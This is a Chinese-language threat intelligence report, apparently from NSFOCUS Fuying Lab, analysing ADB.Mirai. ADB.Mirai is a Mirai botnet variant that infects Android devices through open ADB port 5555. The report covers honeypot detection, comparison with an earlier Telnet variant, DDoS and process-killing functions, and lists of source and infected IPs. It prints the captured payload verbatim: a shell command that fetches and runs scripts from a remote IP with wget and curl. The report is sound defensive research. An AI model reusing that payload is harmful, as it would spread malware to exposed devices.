ADB. Mirai: 利用ADB調試介面進行傳播的Mirai新型變種殭屍網路
- 2019 年 12 月 11 日
- 筆記
早在今年年初,中國外安全廠商已監測到利用開放了ADB調試介面的Android設備進行傳播的挖礦蠕蟲,近期綠盟伏影實驗室威脅被動感知系統再次捕獲到利用ADB介面進行傳播的具有DDoS功能的殭屍網路。經過樣本分析人員研究發現,該殭屍網路家族是Mirai的又一新變種(作者命名為Darks),並且與年初的挖礦樣本掃描行為部分具有高度相似性。不同的是年初的樣本功能為挖礦,而當前樣本功能為DDoS,推測與最近一段時間虛擬貨幣行業不景氣有關。
該樣本和以前捕獲的一組樣本來自於同一個下載源,從程式碼特徵等因素判斷為同一作者製作,我們命名此新惡意樣本為ADB.Mirai。此次捕獲的ADB.Mirai從早期針對弱口令進行爆破攻擊傳播感染,轉變為利用ADB介面進行傳播感染。此次惡意樣本極可能快速搶佔ADB.Miner感染設備,獲取新的肉雞資源進行DDoS攻擊,同時,我們推測同樣快速搶佔挖礦肉雞,或挖礦類蠕蟲木馬更新迭代,轉向更具威脅性攻擊行為的殭屍網路或蠕蟲木馬極可能會迅速增多,請注意防範。
一、伏影實驗室威脅感知系統
網路安全發展至今特別是隨著威脅情報的興起和虛擬化技術的不斷發展,欺騙技術也越來越受到各方的關注。欺騙技術就是威脅感知系統關鍵技術之一。它的高保真、高品質、鮮活性等特徵,使之成為研究敵人的重要手段,同時實時捕獲一手威脅時間不再具有滯後性,非常適合威脅情報的時效性需求。
綠盟伏影實驗室於2017年中旬運營了一套威脅感知系統,發展至今已逐步成熟,感知節點遍布世界五大洲,覆蓋了20多個國家,覆蓋常見服務、IOT服務,工控服務等。形成了以全埠模擬為基礎,智慧交互服務為輔的混合型感知架構,每天從互聯網中捕獲大量的鮮活威脅情報,實時感知威脅。Darks蠕蟲蠕蟲病毒就是被俘於威脅感知系統。
二、攻擊事件總覽
我們威脅感知系統於11月19日首次感知到來自於102.103.123.54的攻擊,之後連續七天都收到多個被感染IP發來的相同攻擊Payload。此次攻擊針對的是TCP的5555埠,分析發現,受害IP通過掃描開放了ADB調試埠的Android設備,並利用其調試功能的可執行能力進行感染傳播。攻擊者在成功投放並執行bash腳本後,會從遠端的伺服器下載多平台惡意樣本,使被攻擊主機作為肉雞繼續對外發起掃描。
Android Debug Bridge(ADB)是Android系統為Android開發人員提供的開放介面和調試工具,通過ADB可以管理、操作Android模擬器和實體設備,如安裝軟體、查看設備軟硬體參數、系統升級、運行shell命令等。在互聯網上存在一些未設置許可權控制,沒有任何密碼,高許可權的情況對外開放了ADB介面的Android設備,如智慧手機,智慧電視,機頂盒等,此次受感染正是這些設備。此樣本具備蠕蟲特性,受感染設備會繼續嘗試感染並投遞惡意程式碼。
三、事件關聯
通過最新捕獲的惡意樣本提取到得C&C地址,我們威脅被動感知系統中查到首次攻擊時間為2018年10月21日,當時使用的攻擊方式為telnet服務弱口令爆破進行傳播(Telnet.Mirai)。對比2次樣本的傳播感染行為,能判斷利用此C&C地址投放行為與惡意程式碼結構等特性,我們判斷2次行為背後是同一黑產組織。
樣本的傳播時間對比
四、捕獲樣本分析-ADB.Mirai
a) 功能描述
蠕蟲式感染
ADB.Mirai通過利用Android設備的adb介面進行傳播,通過隨機生成359個IP地址,並對其5555埠進行掃描,判斷是否可能存在可利用目標。下圖為攻擊payload部分。
排他性
ADB.Mirai通過查看 /proc/pid/ 來檢查進程資訊,該目錄下通常有一個maps文件,代表記憶體映射中載入的庫與文件。樣本通過檢查maps文件中有無特定內容(「/tmp/」),若有則將相關資訊發送至cc伺服器後將進程殺掉。此舉的目的在於殺掉其他可能的惡意程式。讓自身能夠享受被感染機器更多的資源。
DDoS攻擊
目前我們僅分析到一個UDP-Flood攻擊函數,並且通過樣本的分析,我們發現樣本在與C&C通訊之前也僅發現初始化函數鏈表中僅有一個UDP-Flood函數。推測樣本應該還屬於開發中。
b) 新樣本與舊樣本對比
舊樣本命名:Telnet.Mirai
正如時間關聯中我們描述的一樣,我們還獲得了一個通過telnet掃描的樣本,將其命名為:Telnet.Mirai。
差異性對比
通過使用bindiff軟體對比ADB.Mirai和Telnet.Mirai兩個樣本。我們發現這兩個樣本相似度非常高。僅有幾個函數是存在差異,其中一個殺死其他進程的函數是ADB.Mirai新添加的函數。
另外對比兩個樣本的掃描模組,我們發現ADB.Mirai的掃描是由Telnet.Mirai的掃描模組修改而來。
Bash腳本使用的也不盡相同。ADB.Mirai使用的bash腳本相對於Telnet.Mirai使用的腳本要複雜一些,增加了殺死botkiller和miner bot進程的能力。
Bindiff對比圖如下:
總結
通過對比ADB.Mirai和Telnet.Mirai兩個樣本,我們不難發現,他們來自同一個C&C地址,並且從10月21日起該地址下發的樣本有了新的變化,不論是感染方式,還是殺死其他進程獨佔被感染機器的資源。我們可以認定C&C的擁有者,不斷完善自己。未來有很大的可能獲得與它相關聯的新樣本。
五、 樣本來源IP分析
|
IP地址 |
89.46.79.57 |
|---|---|
|
地理位置 |
義大利 |
|
ASN number |
AS31034 |
|
ASN information |
ARUBA-ASN, IT |
通過我們的威脅感知系統可以看到,有很多被感染IP從2018年11月20日 ~ 2018年11月26日 持續對我們的蜜網節點 5555埠發送攻擊相同的Payload (下載地址為同一個IP)。
CNXNx00x00x00x01x00x10x00x00x07x00x00x002x02x00x00xbcxb1xa7xb1host::x00OPENx82x00x00x00x00x00x00x00xbfx00x00x00xa69x00x00xb0xafxbaxb1shell:cd /data/local/tmp;wget http://89.46.79.57/br -O- >br;sh br;busybox wget http://89.46.79.57/r -O- >r;sh r;curl http://89.46.79.57/c >c;sh c;busybox curl http://89.46.79.57/bc >bc;sh bcx00
部分被感染IP
|
IP |
國家 |
|---|---|
|
89.205.77.219 |
馬其頓 |
|
37.20.80.216 |
俄羅斯 |
|
119.77.145.243 |
中國台灣 |
|
168.228.251.67 |
智利 |
|
5.27.53.84 |
土耳其 |
|
196.87.14.121 |
摩洛哥 |
|
180.122.220.101 |
中國 |
|
178.245.229.208 |
土耳其 |
|
102.103.123.54 |
摩洛哥 |
|
118.44.121.120 |
韓國 |
|
178.75.3.113 |
俄羅斯 |
|
190.140.21.246 |
巴拿馬 |
|
151.177.242.221 |
瑞典 |
|
105.190.206.16 |
摩洛哥 |
|
219.77.64.71 |
中國香港 |
|
5.27.53.84 |
土耳其 |
|
58.153.156.98 |
中國香港 |
|
1.170.138.31 |
中國台灣 |
被感染IP在全球的分布情況
我們把樣本下載 89.46.79.57 在我們的威脅感知系統裡面查詢,也發現了該IP在十月,十一月有針對 23、81和37215埠的掃描行為。
關於伏影實驗室
伏影實驗室專註於安全威脅研究與監測技術。涵蓋威脅識別技術,威脅跟蹤技術,威脅捕獲技術,威脅主體識別技術。研究目標包括:殭屍網路威脅,通過掌控現網威脅來識別風險,緩解威脅傷害,為威脅對抗提供決策支撐。
內容編輯:伏影實驗室 責任編輯:肖晴
